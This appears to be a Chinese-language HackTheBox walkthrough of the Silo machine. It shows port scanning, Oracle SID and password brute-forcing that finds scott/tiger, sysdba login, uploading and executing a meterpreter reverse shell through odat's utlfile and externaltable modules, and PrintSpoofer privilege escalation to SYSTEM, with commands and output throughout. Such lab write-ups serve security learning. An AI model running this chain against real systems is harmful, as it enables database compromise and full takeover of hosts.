打靶记录(一五六)之HTBSilo

端口扫描

┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.82
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 10:15 CST
Nmap scan report for 10.10.10.82
Host is up (0.065s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49162/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 10.40 seconds

┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ sudo nmap -sT -sC -sV -O -p80,135,139,445,1521,5985.47001 10.10.10.82 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 10:16 CST
Error #487: Your port specifications are illegal.  Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
QUITTING!
                                                                                                     
┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ sudo nmap -sT -sC -sV -O -p80,135,139,445,1521,5985,47001 10.10.10.82
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 10:17 CST
Nmap scan report for 10.10.10.82
Host is up (0.065s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Vista SP1 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 R2 (94%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -10m55s, deviation: 0s, median: -10m56s
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-09-25T02:06:29
|_  start_date: 2024-09-25T01:59:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.04 seconds

Oracle

80和smb都没有什么信息,转向1521的oracle,根据扫描结果版本是11,那么是可以通过爆破sid的

在Oracle数据库中，SID（System Identifier）是一个唯一标识符，用于标识一个特定的数据库实例。当你启动一个Oracle数据库实例时，系统会分配一个SID给这个实例。用户可以通过这个SID来连接到正确的数据库实例上

┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 10.10.10.82 oracle-sid
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-25 10:46:39
[DATA] max 16 tasks per 1 server, overall 16 tasks, 576 login tries (l:576/p:1), ~36 tries per task
[DATA] attacking oracle-sid://10.10.10.82:1521/
[1521][oracle-sid] host: 10.10.10.82   login: XE
[1521][oracle-sid] host: 10.10.10.82   login: PLSExtProc
[STATUS] 555.00 tries/min, 555 tries in 00:01h, 21 to do in 00:01h, 16 active
[1521][oracle-sid] host: 10.10.10.82   login: CLRExtProc
[1521][oracle-sid] host: 10.10.10.82
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-25 10:47:42

关于oracle渗透若需要安装额外的模块，具体可参考:

https://secybr.com/posts/oracle-pentesting-best-practices/

我这直接使用odat了

┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE

[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521                
The login brio_admin has already been tested at least once. What do you want to do: | ETA:  00:06:17 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password      | ETA:  00:06:22 
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password      | ETA:  00:06:09 
[!] Notice: 'dip' account is locked, so skipping this username for password         | ETA:  00:05:49 
[!] Notice: 'hr' account is locked, so skipping this username for password          | ETA:  00:04:46 
[!] Notice: 'mdsys' account is locked, so skipping this username for password       | ETA:  00:03:45 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password  | ETA:  00:02:57 
[!] Notice: 'outln' account is locked, so skipping this username for password       | ETA:  00:02:39 
[+] Valid credentials found: scott/tiger. Continue...          #####                | ETA:  00:01:28

XEsid获得一组有效凭证,登录

┌──(mikannse㉿kali)-[~]
└─$ sqlplus scott@10.10.10.82     

SQL*Plus: Release 19.0.0.0.0 - Production on Wed Sep 25 14:45:12 2024
Version 19.6.0.0.0

Copyright (c) 1982, 2019, Oracle.  All rights reserved.

Enter password: 

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

然而当前用户并没有特别的权限，但是可以尝试as sysdba登录，以管理员身份登录

┌──(mikannse㉿kali)-[~]
└─$ sqlplus scott@10.10.10.82  as sysdba  

SQL*Plus: Release 19.0.0.0.0 - Production on Wed Sep 25 15:00:17 2024
Version 19.6.0.0.0

Copyright (c) 1982, 2019, Oracle.  All rights reserved.

Enter password: 

Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES NO

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            DELETE_CATALOG_ROLE            YES YES NO
SYS                            EXECUTE_CATALOG_ROLE           YES YES NO
SYS                            EXP_FULL_DATABASE              YES YES NO
SYS                            GATHER_SYSTEM_STATISTICS       YES YES NO
SYS                            HS_ADMIN_EXECUTE_ROLE          YES YES NO
SYS                            HS_ADMIN_ROLE                  YES YES NO
SYS                            HS_ADMIN_SELECT_ROLE           YES YES NO
SYS                            IMP_FULL_DATABASE              YES YES NO
SYS                            LOGSTDBY_ADMINISTRATOR         YES YES NO
SYS                            OEM_ADVISOR                    YES YES NO
SYS                            OEM_MONITOR                    YES YES NO

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            PLUSTRACE                      YES YES NO
SYS                            RECOVERY_CATALOG_OWNER         YES YES NO
SYS                            RESOURCE                       YES YES NO
SYS                            SCHEDULER_ADMIN                YES YES NO
SYS                            SELECT_CATALOG_ROLE            YES YES NO
SYS                            XDBADMIN                       YES YES NO
SYS                            XDB_SET_INVOKER                YES YES NO
SYS                            XDB_WEBSERVICES                YES YES NO
SYS                            XDB_WEBSERVICES_OVER_HTTP      YES YES NO
SYS                            XDB_WEBSERVICES_WITH_PUBLIC    YES YES NO

32 rows selected.

现在我们有了管理员权限

查看一下odat的wiki,有一个非常强大的模块: https://github.com/quentinhardy/odat/wiki/externaltable

能够远程下载可执行文件并且执行,那么可以生成一个meterpreter反弹shell来直接执行Getshell,可以配合utlfile用来上传文件到服务器

[1] (10.10.10.82:1521): Put the /home/mikannse/HTB/silo/shell.exe local file in the c:/windows/temp folder like shell.exe on the 10.10.10.82 server                                                       
[+] The /home/mikannse/HTB/silo/shell.exe file was created on the c:/windows/temp directory on the 10.10.10.82 server like the shell.exe file

┌──(mikannse㉿kali)-[~/HTB/silo]
└─$ odat externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec "c:/windows/temp" shell.exe 

[1] (10.10.10.82:1521): Execute the shell.exe command stored in the c:/windows/temp path

成功拿到shell

提权

msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.29:443 
[*] Sending stage (201798 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.29:443 -> 10.10.10.82:49163) at 2024-09-25 15:41:47 +0800

meterpreter > 

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeLockMemoryPrivilege           Lock pages in memory                      Enabled 
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTcbPrivilege                  Act as part of the operating system       Enabled 
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Enabled 
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Enabled 
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Enabled 
SeCreatePagefilePrivilege       Create a pagefile                         Enabled 
SeCreatePermanentPrivilege      Create permanent shared objects           Enabled 
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeAuditPrivilege                Generate security audits                  Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Enabled 
SeTimeZonePrivilege             Change the time zone                      Enabled 
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Enabled

模拟令牌权限，稳了。

meterpreter > upload /home/mikannse/tools/Privesc/win/PrintSpoofer64.exe
[*] Uploading  : /home/mikannse/tools/Privesc/win/PrintSpoofer64.exe -> PrintSpoofer64.exe
[*] Uploaded 26.50 KiB of 26.50 KiB (100.0%): /home/mikannse/tools/Privesc/win/PrintSpoofer64.exe -> PrintSpoofer64.exe
[*] Completed  : /home/mikannse/tools/Privesc/win/PrintSpoofer64.exe -> PrintSpoofer64.exe

一把梭了

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>PrintSpoofer64.exe -i -c cmd.exe
PrintSpoofer64.exe -i -c cmd.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

碎碎念

第一次打oracle，用现成的工具还是方便，有空再学学oracle